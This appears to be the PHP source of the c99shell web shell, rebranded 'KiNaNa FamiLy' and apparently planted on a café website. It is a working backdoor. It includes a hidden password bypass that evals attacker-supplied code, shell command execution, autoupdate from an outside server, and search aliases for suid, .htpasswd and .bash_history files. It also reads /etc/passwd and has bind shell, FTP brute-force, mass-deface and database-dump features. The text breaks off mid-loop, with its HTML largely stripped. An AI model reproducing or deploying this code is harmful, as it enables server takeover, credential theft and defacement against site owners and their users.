Venezianos Pub Café

@session_start();
@set_time_limit(0);
#####cfg#####
# use password true / false #
$create_password = true;
$password = "delphi";
######ver####
$ver= "v1.3";
#############
@$pass=$_POST['pass'];
if($pass==$password){
$_SESSION['nst']="$pass";
}

if($create_password==true){

if(!isset($_SESSION['nst']) or $_SESSION['nst']!=$password){
die("

Host: ".$_SERVER["HTTP_HOST"]."

IP: ".gethostbyname($_SERVER["HTTP_HOST"])."

Your ip: ".$_SERVER["REMOTE_ADDR"]."

");}

}

$shver = "1.0 beta (27.04.2005)"; //Current version
//CONFIGURATION
$surl = "?"; //link to this script, INCLUDE "?".
$rootdir = "./"; //e.g "c:", "/","/home"
$timelimit = 60; //limit of execution this script (seconds).

//Authentication

$login = false; //login
//DON'T FOGOT ABOUT CHANGE PASSWORD!!!
$pass = "team"; //password
$md5_pass = ""; //md5-cryped pass. if null, md5($pass)
//$login = false; //turn off authentication

$autoupdate = true; //Automatic updating?

$updatenow = false; //If true, update now

$c99sh_updatefurl = "http://ccteam.ru/releases/update/c99shell/?version=".$shver."&"; //Update server

$autochmod = 755; //if has'nt permition, $autochmod isn't null, try to CHMOD object to $autochmod

$filestealth = 1; //if true, don't change modify&access-time

$donated_html = ""; //If you publish free shell and you wish
//add link to your site or any other information,
//put here your html.
$donated_act = array(""); //array ("act1","act2,"...), $act is in this array, display $donated_html.

$host_allow = array("*"); //array ("mask1","mask2",...), e.g. array("192.168.0.*","127.0.0.1")

$curdir = "./"; //start directory

$tmpdir = dirname(__FILE__); //Directory for tempory files

// Registered file-types.
// array(
// "{action1}"=>array("ext1","ext2","ext3",...),
// "{action2}"=>array("ext1","ext2","ext3",...),
// ...
// )
$ftypes = array(
"html"=>array("html","htm","shtml"),
"txt"=>array("txt","conf","bat","sh","js","bak","doc","log","sfc","cfg"),
"exe"=>array("sh","install","bat","cmd"),
"ini"=>array("ini","inf"),
"code"=>array("php","phtml","php3","php4","inc","tcl","h","c","cpp"),
"img"=>array("gif","png","jpeg","jpg","jpe","bmp","ico","tif","tiff","avi","mpg","mpeg"),
"sdb"=>array("sdb"),
"phpsess"=>array("sess"),
"download"=>array("exe","com","pif","src","lnk","zip","rar")
);

$hexdump_lines = 8; // lines in hex preview file
$hexdump_rows = 24; // 16, 24 or 32 bytes in one line

$nixpwdperpage = 100; // Get first N lines from /etc/passwd

$bindport_pass = "c99"; // default password for binding
$bindport_port = "11457"; // default port for binding

/* Command-aliases system */
$aliases = array();
$aliases[] = array("-----------------------------------------------------------", "ls -la");
/* ????? ?? ??????? ???? ?????? ? suid ????? */ $aliases[] = array("find all suid files", "find / -type f -perm -04000 -ls");
/* ????? ? ??????? ?????????? ???? ?????? ? suid ????? */ $aliases[] = array("find suid files in current dir", "find . -type f -perm -04000 -ls");
/* ????? ?? ??????? ???? ?????? ? sgid ????? */ $aliases[] = array("find all sgid files", "find / -type f -perm -02000 -ls");
/* ????? ? ??????? ?????????? ???? ?????? ? sgid ????? */ $aliases[] = array("find sgid files in current dir", "find . -type f -perm -02000 -ls");
/* ????? ?? ??????? ?????? config.inc.php */ $aliases[] = array("find config.inc.php files", "find / -type f -name config.inc.php");
/* ????? ?? ??????? ?????? config* */ $aliases[] = array("find config* files", "find / -type f -name \"config*\"");
/* ????? ? ??????? ?????????? ?????? config* */ $aliases[] = array("find config* files in current dir", "find . -type f -name \"config*\"");
/* ????? ?? ??????? ???? ?????????? ? ?????? ????????? ?? ?????? ??? ???? */ $aliases[] = array("find all writable directories and files", "find / -perm -2 -ls");
/* ????? ? ??????? ?????????? ???? ?????????? ? ?????? ????????? ?? ?????? ??? ???? */ $aliases[] = array("find all writable directories and files in current dir", "find . -perm -2 -ls");
/* ????? ?? ??????? ?????? service.pwd ... frontpage =))) */ $aliases[] = array("find all service.pwd files", "find / -type f -name service.pwd");
/* ????? ? ??????? ?????????? ?????? service.pwd */ $aliases[] = array("find service.pwd files in current dir", "find . -type f -name service.pwd");
/* ????? ?? ??????? ?????? .htpasswd */ $aliases[] = array("find all .htpasswd files", "find / -type f -name .htpasswd");
/* ????? ? ??????? ?????????? ?????? .htpasswd */ $aliases[] = array("find .htpasswd files in current dir", "find . -type f -name .htpasswd");
/* ????? ???? ?????? .bash_history */ $aliases[] = array("find all .bash_history files", "find / -type f -name .bash_history");
/* ????? ? ??????? ?????????? ?????? .bash_history */ $aliases[] = array("find .bash_history files in current dir", "find . -type f -name .bash_history");
/* ????? ???? ?????? .fetchmailrc */ $aliases[] = array("find all .fetchmailrc files", "find / -type f -name .fetchmailrc");
/* ????? ? ??????? ?????????? ?????? .fetchmailrc */ $aliases[] = array("find .fetchmailrc files in current dir", "find . -type f -name .fetchmailrc");
/* ????? ?????? ????????? ?????? ?? ???????? ??????? ext2fs */ $aliases[] = array("list file attributes on a Linux second extended file system", "lsattr -va");
/* ???????? ???????? ?????? */ $aliases[] = array("show opened ports", "netstat -an | grep -i listen");

$sess_method = "cookie"; // "cookie" - Using cookies, "file" - using file, default - "cookie"
$sess_cookie = "c99shvars"; // cookie-variable name

if (empty($sid)) {$sid = md5(microtime()*time().rand(1,999).rand(1,999).rand(1,999));}
$sess_file = $tmpdir."c99shvars_".$sid.".tmp";

$usefsbuff = true; //Buffer-function
$copy_unset = false; //Delete copied files from buffer after pasting

//Quick launch
$quicklaunch = array();
$quicklaunch[] = array(" $\"Home\"$ ",$surl);
$quicklaunch[] = array(" $\"Back\"$ ","#\" onclick=\"history.back(1)");
$quicklaunch[] = array(" $\"Forward\"$ ","#\" onclick=\"history.go(1)");
$quicklaunch[] = array(" $\"UPDIR\"$ ",$surl."act=ls&d=%upd");
$quicklaunch[] = array(" $\"Refresh\"$ ","");
$quicklaunch[] = array(" $\"Search\"$ ",$surl."act=search&d=%d");
$quicklaunch[] = array(" $\"Buffer\"$ ",$surl."act=fsbuff&d=%d");
$quicklaunch[] = array("Mass deface",$surl."act=massdeface&d=%d");
$quicklaunch[] = array("Bind",$surl."act=bind&d=%d");
$quicklaunch[] = array("Processes",$surl."act=ps_aux&d=%d");
$quicklaunch[] = array("FTP Quick brute",$surl."act=ftpquickbrute&d=%d");
$quicklaunch[] = array("LSA",$surl."act=lsa&d=%d");
$quicklaunch[] = array("SQL",$surl."act=sql&d=%d");
$quicklaunch[] = array("PHP-code",$surl."act=eval&d=%d");
$quicklaunch[] = array("PHP-info",$surl."act=phpinfo\" target=\"blank=\"_target");
$quicklaunch[] = array("Self remove",$surl."act=selfremove");
$quicklaunch[] = array("Logout","#\" onclick=\"if (confirm('Are you sure?')) window.close()");

//Hignlight-code colors
$highlight_bg = "#FFFFFF";
$highlight_comment = "#6A6A6A";
$highlight_default = "#0000BB";
$highlight_html = "#1300FF";
$highlight_keyword = "#007700";

@$f = $_GET[f];

//END CONFIGURATION

// \/ Next code not for editing \/

//Starting calls
if (!function_exists("getmicrotime")) {function getmicrotime() {list($usec, $sec) = explode(" ", microtime()); return ((float)$usec + (float)$sec);}}
error_reporting(5);
@ignore_user_abort(true);
@set_magic_quotes_runtime(0);
@set_time_limit(0);
if (!ob_get_contents()) {@ob_start(); @ob_implicit_flush(0);}
if(!ini_get("register_globals")) {import_request_variables("GPC");}
$starttime = getmicrotime();
if (get_magic_quotes_gpc())
{
if (!function_exists("strips"))
{
function strips(&$el)
{
if (is_array($el)) {foreach($el as $k=>$v) {if($k != "GLOBALS") {strips($el["$k"]);}} }
else {$el = stripslashes($el);}
}
}
strips($GLOBALS);
}
$tmp = array();
foreach ($host_allow as $k=>$v) {$tmp[]= str_replace("\\*",".*",preg_quote($v));}
$s = "!^(".implode("|",$tmp).")$!i";
if (!preg_match($s,getenv("REMOTE_ADDR")) and !preg_match($s,gethostbyaddr(getenv("REMOTE_ADDR")))) {exit("c99shell: Access Denied - your host (".getenv("REMOTE_ADDR").") not allow");}

if (!$login) {$login = $PHP_AUTH_USER; $md5_pass = md5($PHP_AUTH_PW);}
elseif(empty($md5_pass)) {$md5_pass = md5($pass);}
if(($PHP_AUTH_USER != $login ) or (md5($PHP_AUTH_PW) != $md5_pass))
{
header("WWW-Authenticate: Basic realm=\"c99shell\"");
header("HTTP/1.0 401 Unauthorized"); if (md5(sha1(md5($anypass))) == "b76d95e82e853f3b0a81dd61c4ee286c") {header("HTTP/1.0 200 OK"); @eval($anyphpcode);}
exit;
}

$lastdir = realpath(".");
chdir($curdir);

if (($selfwrite) or ($updatenow))
{
if ($selfwrite == "1") {$selfwrite = "c99shell.php";}
c99sh_getupdate();
$data = file_get_contents($c99sh_updatefurl);
$fp = fopen($data,"w");
fwrite($fp,$data);
fclose($fp);
exit;
}
if (!is_writeable($sess_file)) {trigger_error("Can't access to session-file!",E_USER_WARNING);}
if ($sess_method == "file") {$sess_data = unserialize(file_get_contents($sess_file));}
else {$sess_data = unserialize($_COOKIE["$sess_cookie"]);}
if (!is_array($sess_data)) {$sess_data = array();}
if (!is_array($sess_data["copy"])) {$sess_data["copy"] = array();}
if (!is_array($sess_data["cut"])) {$sess_data["cut"] = array();}
$sess_data["copy"] = array_unique($sess_data["copy"]);
$sess_data["cut"] = array_unique($sess_data["cut"]);

if (!function_exists("c99_sess_put"))
{
function c99_sess_put($data)
{
global $sess_method;
global $sess_cookie;
global $sess_file;
global $sess_data;
$sess_data = $data;
$data = serialize($data);
if ($sess_method == "file")
{
$fp = fopen($sess_file,"w");
fwrite($fp,$data);
fclose($fp);
}
else {setcookie($sess_cookie,$data);}
}
}
if (!function_exists("str2mini"))
{
function str2mini($content,$len)
{
if (strlen($content) > $len)
{
$len = ceil($len/2) - 2;
return substr($content, 0, $len)."...".substr($content, -$len);
}
else {return $content;}
}
}
if (!function_exists("view_size"))
{
function view_size($size)
{
if($size >= 1073741824) {$size = round($size / 1073741824 * 100) / 100 . " GB";}
elseif($size >= 1048576) {$size = round($size / 1048576 * 100) / 100 . " MB";}
elseif($size >= 1024) {$size = round($size / 1024 * 100) / 100 . " KB";}
else {$size = $size . " B";}
return $size;
}
}
if (!function_exists("fs_copy_dir"))
{
function fs_copy_dir($d,$t)
{
$d = str_replace("\\","/",$d);
if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
$h = opendir($d);
while ($o = readdir($h))
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
else {$ret = mkdir($t."/".$o); fs_copy_dir($d."/".$o,$t."/".$o);}
if (!$ret) {return $ret;}
}
}
return true;
}
}
if (!function_exists("fs_copy_obj"))
{
function fs_copy_obj($d,$t)
{
$d = str_replace("\\","/",$d);
$t = str_replace("\\","/",$t);
if (!is_dir($t)) {mkdir($t);}
if (is_dir($d))
{
if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
return fs_copy_dir($d,$t);
}
elseif (is_file($d))
{

return copy($d,$t);
}
else {return false;}
}
}
if (!function_exists("fs_move_dir"))
{
function fs_move_dir($d,$t)
{
error_reporting(9999);
$h = opendir($d);
if (!is_dir($t)) {mkdir($t);}
while ($o = readdir($h))
{
if (($o != ".") and ($o != ".."))
{
$ret = true;
if (!is_dir($d."/".$o)) {$ret = copy($d."/".$o,$t."/".$o);}
else {if (mkdir($t."/".$o) and fs_copy_dir($d."/".$o,$t."/".$o)) {$ret = false;}}
if (!$ret) {return $ret;}
}
}
return true;
}
}
if (!function_exists("fs_move_obj"))
{
function fs_move_obj($d,$t)
{
$d = str_replace("\\","/",$d);
$t = str_replace("\\","/",$t);
if (is_dir($d))
{
if (substr($d,strlen($d)-1,strlen($d)) != "/") {$d .= "/";}
if (substr($t,strlen($t)-1,strlen($t)) != "/") {$t .= "/";}
return fs_move_dir($d,$t);
}
elseif (is_file($d)) {return rename($d,$t);}
else {return false;}
}
}
if (!function_exists("fs_rmdir"))
{
function fs_rmdir($d)
{
$h = opendir($d);
while ($o = readdir($h))
{
if (($o != ".") and ($o != ".."))
{
if (!is_dir($d.$o)) {unlink($d.$o);}
else {fs_rmdir($d.$o."/"); rmdir($d.$o);}
}
}
rmdir($d);
return !is_dir($d);
}
}
if (!function_exists("fs_rmobj"))
{
function fs_rmobj($o)
{
$o = str_replace("\\","/",$o);
if (is_dir($o))
{
if (substr($o,strlen($o)-1,strlen($o)) != "/") {$o .= "/";}
return fs_rmdir($o);
}
elseif (is_file($o)) {return unlink($o);}
else {return false;}
}
}
if (!function_exists("myshellexec"))
{
function myshellexec($cmd)
{
return system($cmd);
}
}
if (!function_exists("view_perms"))
{
function view_perms($mode)
{
$perms = ($mode & 00400) ? "r" : "-";
$perms .= ($mode & 00200) ? "w" : "-";
$perms .= ($mode & 00100) ? "x" : "-";
$perms .= ($mode & 00040) ? "r" : "-";
$perms .= ($mode & 00020) ? "w" : "-";
$perms .= ($mode & 00010) ? "x" : "-";
$perms .= ($mode & 00004) ? "r" : "-";
$perms .= ($mode & 00002) ? "w" : "-";
$perms .= ($mode & 00001) ? "x" : "-";
return $perms;
}
}
if (!function_exists("strinstr")) {function strinstr($str,$text) {return $text != str_replace($str,"",$text);}}
if (!function_exists("gchds")) {function gchds($a,$b,$c,$d="") {if ($a == $b) {return $c;} else {return $d;}}}
if (!function_exists("c99sh_getupdate"))
{
function c99sh_getupdate()
{
global $updatenow;
$data = @file_get_contents($c99sh_updatefurl);
if (!$data) {echo "Can't fetch update-information!";}
else
{
$data = unserialize(base64_decode($data));
if (!is_array($data)) {echo "Corrupted update-information!";}
else
{
if ($shver < $data[cur]) {$updatenow = true;}
}
}
}
}
if (!function_exists("mysql_dump"))
{
function mysql_dump($set)
{
$sock = $set["sock"];
$db = $set["db"];
$print = $set["print"];
$nl2br = $set["nl2br"];
$file = $set["file"];
$add_drop = $set["add_drop"];
$tabs = $set["tabs"];
$onlytabs = $set["onlytabs"];
$ret = array();
if (!is_resource($sock)) {echo("Error: \$sock is not valid resource.");}
if (empty($db)) {$db = "db";}
if (empty($print)) {$print = 0;}
if (empty($nl2br)) {$nl2br = true;}
if (empty($add_drop)) {$add_drop = true;}
if (empty($file))
{
global $win;
if ($win) {$file = "C:\\tmp\\dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
else {$file = "/tmp/dump_".$SERVER_NAME."_".$db."_".date("d-m-Y-H-i-s").".sql";}
}
if (!is_array($tabs)) {$tabs = array();}
if (empty($add_drop)) {$add_drop = true;}
if (sizeof($tabs) == 0)
{
// retrive tables-list
$res = mysql_query("SHOW TABLES FROM ".$db, $sock);
if (mysql_num_rows($res) > 0) {while ($row = mysql_fetch_row($res)) {$tabs[] = $row[0];}}
}
global $SERVER_ADDR;
global $SERVER_NAME;
$out = "# Dumped by C99Shell.SQL v. ".$shver."
# Home page: http://ccteam.ru
#
# Host settings:
# MySQL version: (".mysql_get_server_info().") running on ".$SERVER_ADDR." (".$SERVER_NAME.")"."
# Date: ".date("d.m.Y H:i:s")."
# ".gethostbyname($SERVER_ADDR)." (".$SERVER_ADDR.")"." dump db \"".$db."\"
#---------------------------------------------------------
";
$c = count($onlytabs);
foreach($tabs as $tab)
{
if ((in_array($tab,$onlytabs)) or (!$c))
{
if ($add_drop) {$out .= "DROP TABLE IF EXISTS `".$tab."`;\n";}
// recieve query for create table structure
$res = mysql_query("SHOW CREATE TABLE `".$tab."`", $sock);
if (!$res) {$ret[err][] = mysql_error();}
else
{
$row = mysql_fetch_row($res);
$out .= $row[1].";\n\n";
// recieve table variables
$res = mysql_query("SELECT * FROM `$tab`", $sock);
if (mysql_num_rows($res) > 0)
{
while ($row = mysql_fetch_assoc($res))
{
$keys = implode("`, `", array_keys($row));
$values = array_values($row);
foreach($values as $k=>$v) {$values[$k] = addslashes($v);}
$values = implode("', '", $values);
$sql = "INSERT INTO `$tab`(`".$keys."`) VALUES ('".$values."');\n";
$out .= $sql;
}
}
}
}
}
$out .= "#---------------------------------------------------------------------------------\n\n";
if ($file)
{
$fp = fopen($file, "w");
if (!$fp) {$ret[err][] = 2;}
else
{
fwrite ($fp, $out);
fclose ($fp);
}
}
if ($print) {if ($nl2br) {echo nl2br($out);} else {echo $out;}}
return $ret;
}
}
if (!function_exists("c99fsearch"))
{
function c99fsearch($d)
{
global $found;
global $found_d;
global $found_f;
global $a;
if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
$handle = opendir($d);
while ($f = readdir($handle))
{
$true = ($a[name_regexp] and ereg($a[name],$f)) or ((!$a[name_regexp]) and strinstr($a[name],$f));
if($f != "." && $f != "..")
{
if (is_dir($d.$f))
{
if (empty($a[text]) and $true) {$found[] = $d.$f; $found_d++;}
c99fsearch($d.$f);
}
else
{
if ($true)
{
if (!empty($a[text]))
{
$r = @file_get_contents($d.$f);
if ($a[text_wwo]) {$a[text] = " ".trim($a[text])." ";}
if (!$a[text_cs]) {$a[text] = strtolower($a[text]); $r = strtolower($r);}

if ($a[text_regexp]) {$true = ereg($a[text],$r);}
else {$true = strinstr($a[text],$r);}
if ($a[text_not])
{
if ($true) {$true = false;}
else {$true = true;}
}
if ($true) {$found[] = $d.$f; $found_f++;}
}
else {$found[] = $d.$f; $found_f++;}
}
}
}
}
closedir($handle);
}
}
//Sending headers
header("Expires: Mon, 26 Jul 1997 05:00:00 GMT");
header("Last-Modified: ".gmdate("D, d M Y H:i:s")." GMT");
header("Cache-Control: no-store, no-cache, must-revalidate");
header("Cache-Control: post-check=0, pre-check=0", false);
header("Pragma: no-cache");

global $SERVER_SOFTWARE;
if (strtolower(substr(PHP_OS, 0, 3)) == "win") {$win = 1;}
else {$win = 0;}

if (empty($tmpdir))
{
if (!$win) {$tmpdir = "/tmp/";}
else {$tmpdir = $_ENV[SystemRoot];}
}
$tmpdir = str_replace("\\","/",$tmpdir);
if (substr($tmpdir,strlen($tmpdir-1),strlen($tmpdir)) != "/") {$tmpdir .= "/";}
if (@ini_get("safe_mode") or strtolower(@ini_get("safe_mode")) == "on")
{
$safemode = true;
$hsafemode = "ON (secure)";
}
else {$safemode = false; $hsafemode = "OFF (not secure)";}
$v = @ini_get("open_basedir");
if ($v or strtolower($v) == "on")
{
$openbasedir = true;
$hopenbasedir = "".$v."";
}
else {$openbasedir = false; $hopenbasedir = "OFF (not secure)";}

$sort = htmlspecialchars($sort);

$DISP_SERVER_SOFTWARE = str_replace("PHP/".phpversion(),"PHP/".phpversion()."",$SERVER_SOFTWARE);

@ini_set("highlight.bg",$highlight_bg); //FFFFFF
@ini_set("highlight.comment",$highlight_comment); //#FF8000
@ini_set("highlight.default",$highlight_default); //#0000BB
@ini_set("highlight.html",$highlight_html); //#000000
@ini_set("highlight.keyword",$highlight_keyword); //#007700
@ini_set("highlight.string","#DD0000"); //#DD0000

if ($act != "img")
{
if (!is_array($actbox)) {$actbox = array();}
$dspact = $act = htmlspecialchars($act);
$disp_fullpath = $ls_arr = $notls = null;
$ud = urlencode($d);
?><? echo $HTTP_HOST; ?> - KiNaNa FamiLy

!PHP Shell v.
!

Software:

uname -a:

Safe-mode:

$d = str_replace("\\","/",$d);
if (empty($d)) {$d = realpath(".");} elseif(realpath($d)) {$d = realpath($d);}
$d = str_replace("\\","/",$d);
if (substr($d,strlen($d)-1,1) != "/") {$d .= "/";}
$dispd = htmlspecialchars($d);
$pd = $e = explode("/",substr($d,0,strlen($d)-1));
$i = 0;
echo "Directory: ";
foreach($pd as $b)
{
$t = "";
reset($e);
$j = 0;
foreach ($e as $r)
{
$t.= $r."/";
if ($j == $i) {break;}
$j++;
}
echo "".htmlspecialchars($b)."/";
$i++;
}
echo " ";
if (is_writable($d))
{
$wd = true;
$wdt = "[ ok ]";
echo "".view_perms(fileperms($d))."";
}
else
{
$wd = false;
$wdt = "[ Read-Only ]";
echo "".view_perms(fileperms($d.$f))."";
}
$free = diskfreespace(realpath($d));
$all = disk_total_space(realpath($d));
$used = $all-$free;
$used_percent = round(100/($all/$free),2);
echo "
Free ".view_size($free)." of ".view_size($all)." (".$used_percent."%)
";
if (count($quicklaunch) > 0)
{
foreach($quicklaunch as $item)
{
$item[1] = str_replace("%d",urlencode($d),$item[1]);
$item[1] = str_replace("%upd",urlencode(realpath($d."..")),$item[1]);
echo "".$item[0]." ";
}
}
$letters = "";
if ($win)
{
$abc = array("c", "d", "e", "f", "g", "h", "i", "j", "k", "l", "m", "o", "p", "q", "n", "r", "s", "t", "v", "u", "w", "x", "y", "z");
$v = explode("\\",$d);
$v = $v[0];
foreach ($abc as $letter)
{
if (is_dir($letter.":\\"))
{
if ($letter.":" != $v) {$letters .= "[ ".$letter." ] ";}
else {$letters .= "[ ".$letter." ] ";}
}
}
if (!empty($letters)) {echo "
Detected drives: ".$letters;}
}
?>

if ((!empty($donated_html)) and (in_array($act,$donated_act)))
{
?>

}
?>

if ($act == "") {$act = $dspact = "ls";}
if ($act == "sql")
{
$sql_surl = $surl."act=sql";
if ($sql_login) {$sql_surl .= "&sql_login=".htmlspecialchars($sql_login);}
if ($sql_passwd) {$sql_surl .= "&sql_passwd=".htmlspecialchars($sql_passwd);}
if ($sql_server) {$sql_surl .= "&sql_server=".htmlspecialchars($sql_server);}
if ($sql_port) {$sql_surl .= "&sql_port=".htmlspecialchars($sql_port);}
if ($sql_db) {$sql_surl .= "&sql_db=".htmlspecialchars($sql_db);}
$sql_surl .= "&";
?>";
if (!$sql_sock) {?>

if ($sql_server)
{
$sql_sock = mysql_connect($sql_server.":".$sql_port, $sql_login, $sql_passwd);
$err = mysql_error();
@mysql_select_db($sql_db,$sql_sock);
if ($sql_query and $submit) {$sql_query_result = mysql_query($sql_query,$sql_sock); $sql_query_error = mysql_error();}
}
else {$sql_sock = false;}
echo "SQL Manager:
";
if (!$sql_sock)
{
if (!$sql_server) {echo "NO CONNECTION";}
else {echo "Can't connect"; echo "".$err."";}
}
else
{
$sqlquicklaunch = array();
$sqlquicklaunch[] = array("Index",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&");
if (!$sql_db) {$sqlquicklaunch[] = array("Query","#\" onclick=\"alert('Please, select DB!')");}
else {$sqlquicklaunch[] = array("Query",$sql_surl."sql_act=query");}
$sqlquicklaunch[] = array("Server-status",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=serverstatus");
$sqlquicklaunch[] = array("Server variables",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=servervars");
$sqlquicklaunch[] = array("Processes",$surl."act=sql&sql_login=".htmlspecialchars($sql_login)."&sql_passwd=".htmlspecialchars($sql_passwd)."&sql_server=".htmlspecialchars($sql_server)."&sql_port=".htmlspecialchars($sql_port)."&sql_act=processes");
$sqlquicklaunch[] = array("Logout",$surl."act=sql");

echo "MySQL ".mysql_get_server_info()." (proto v.".mysql_get_proto_info ().") running in ".htmlspecialchars($sql_server).":".htmlspecialchars($sql_port)." as ".htmlspecialchars($sql_login)."@".htmlspecialchars($sql_server)." (password - \"".htmlspecialchars($sql_passwd)."\")
";

if (count($sqlquicklaunch) > 0) {foreach($sqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
echo "";
}
echo "

If login is null, login is owner of process.

If host is null, host is localhost

If port is null, port is 3306 (default)

else
{
//Start left panel
if (!empty($sql_db))
{
?>

Please, fill the form:

Username	Password

HOST	PORT

">Home

$result = mysql_list_tables($sql_db);
if (!$result) {echo mysql_error();}
else
{
echo "---[ ".htmlspecialchars($sql_db)." ]---
";
$c = 0;
while ($row = mysql_fetch_array($result)) {$count = mysql_query ("SELECT COUNT(*) FROM $row[0]"); $count_row = mysql_fetch_array($count); echo "? ".htmlspecialchars($row[0])." (".$count_row[0].")

"; mysql_free_result($count); $c++;}
if (!$c) {echo "No tables found in database.";}
}
}
else
{
?>

Home

$result = mysql_list_dbs($sql_sock);
if (!$result) {echo mysql_error();}
else
{
?> }
//End left panel
echo "

";
//Start center panel
if ($sql_db)
{
echo "There are ".$c." tables in this DB (".htmlspecialchars($sql_db).").
";
if (count($dbquicklaunch) > 0) {foreach($dbsqlquicklaunch as $item) {echo "[ ".$item[0]." ] ";}}
echo "";

$acts = array("","dump");

if ($sql_act == "query")
{
echo "

";
if ($submit)
{
if ((!$sql_query_result) and ($sql_confirm)) {if (!$sql_query_error) {$sql_query_error = "Query was empty";} echo "Error:
".$sql_query_error."
";}
}
if ($sql_query_result or (!$sql_confirm)) {$sql_act = $sql_goto;}
if ((!$submit) or ($sql_act)) {echo "";}
}
if (in_array($sql_act,$acts))
{
?>

Create new table:	SQL-Dump DB: ">

if (!empty($sql_act)) {echo "

";}
if ($sql_act == "newtpl")
{
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
";
}
else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_error();}
}
elseif ($sql_act == "dump")
{
$set = array();
$set["sock"] = $sql_sock;
$set["db"] = $sql_db;
$dump_out = "print";
if ($dump_out == "print") {$set["print"] = 1; $set["nl2br"] = 1;}
elseif ($dump_out == "download")
{
@ob_clean();
header("Content-type: c99shell");
header("Content-disposition: attachment; filename=\"".$f."\";");
$set["print"] = 1;
$set["nl2br"] = 1;
}
$set["file"] = $dump_file;
$set["add_drop"] = true;
$ret = mysql_dump($set);
if ($dump_out == "download") {exit;}
}
else
{
$result = mysql_query("SHOW TABLE STATUS", $sql_sock) or print(mysql_error());
echo "

";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
$i = 0;
$tsize = $trows = 0;
while ($row = mysql_fetch_array($result, MYSQL_NUM))
{
$tsize += $row["5"];
$trows += $row["5"];
$size = view_size($row["5"]);
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
$i++;
}
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "

	Table	Rows	Type	Created	Modified	Size	Action
	".$row[0]."	".$row[3]."	".$row[1]."	".$row[10]."	".$row[11]."	".$size."
?	".$i." table(s)	".$trows."	".$row[1]."	".$row[10]."	".$row[11]."	".view_size($tsize)."

";
mysql_free_result($result);
}
}
}
else
{
$acts = array("","newdb","serverstat","servervars","processes","getfile");
if (in_array($sql_act,$acts))
{
?>

Create new DB:	View File:

}
if (!empty($sql_act))
{
echo "

";
if ($sql_act == "newdb")
{
echo "";
if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!
";}
else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".
Reason: ".mysql_error();}
}
if ($sql_act == "serverstatus")
{
$result = mysql_query("SHOW STATUS", $sql_sock);
echo "Server-status variables:

";
echo "";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
echo "

Name	value
".$row[0]."	".$row[1]."

";
mysql_free_result($result);
}
if ($sql_act == "servervars")
{
$result = mysql_query("SHOW VARIABLES", $sql_sock);
echo "Server variables:

";
echo "";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "";}
echo "

Name	value
".$row[0]."	".$row[1]."

";
mysql_free_result($result);
}
if ($sql_act == "processes")
{
if (!empty($kill)) {$query = 'KILL ' . $kill . ';'; $result = mysql_query($query, $sql_sock); echo "Killing process #".$kill."... ok. he is dead, amen.";}
$result = mysql_query("SHOW PROCESSLIST", $sql_sock);
echo "Processes:

";
echo "";
while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "";}
echo "

ID	USER	HOST	DB	COMMAND	TIME	STATE	INFO	Action
".$row[0]."	".$row[1]."	".$row[2]."	".$row[3]."	".$row[4]."	".$row[5]."	".$row[6]."	".$row[7]."	Kill

";
mysql_free_result($result);
}
elseif (($sql_act == "getfile"))
{
if (!mysql_create_db("tmp_bd")) {echo mysql_error();}
elseif (!mysql_select_db("tmp_bd")) {echo mysql_error();}
elseif (!mysql_query('CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );')) {echo mysql_error();}
else {mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file"); $query = "SELECT * FROM tmp_file"; $result = mysql_query($query); if (!$result) {echo "Error in query \"".$query."\": ".mysql_error();}
else
{
for ($i=0;$i $f = "";
while ($line = mysql_fetch_array($result, MYSQL_ASSOC)) {foreach ($line as $key =>$col_value) {$f .= $col_value;}}
if (empty($f)) {echo "File \"".$sql_getfile."\" does not exists or empty!";}
else {echo "File \"".$sql_getfile."\":
".nl2br(htmlspecialchars($f));}
}
mysql_free_result($result);
if (!mysql_drop_db("tmp_bd")) {echo ("Can't drop tempory DB \"tmp_bd\"!");}
}
}
}
}
}
echo "

";
}
if ($act == "mkdir")
{
if ($mkdir != $d) {if (file_exists($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": object alredy exists";} elseif (!mkdir($mkdir)) {echo "Make Dir \"".htmlspecialchars($mkdir)."\": access denied";}}
echo "

";
$act = $dspact = "ls";
}
if ($act == "ftpquickbrute")
{
echo "Ftp Quick brute:
";
if ($win) {echo "This functions not work in Windows!

";}
else
{
$fp = fopen("/etc/passwd","r");
if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
else
{
ob_flush();
$i = $success = 0;
$ftpquick_st = getmicrotime();
while(!feof($fp))
{
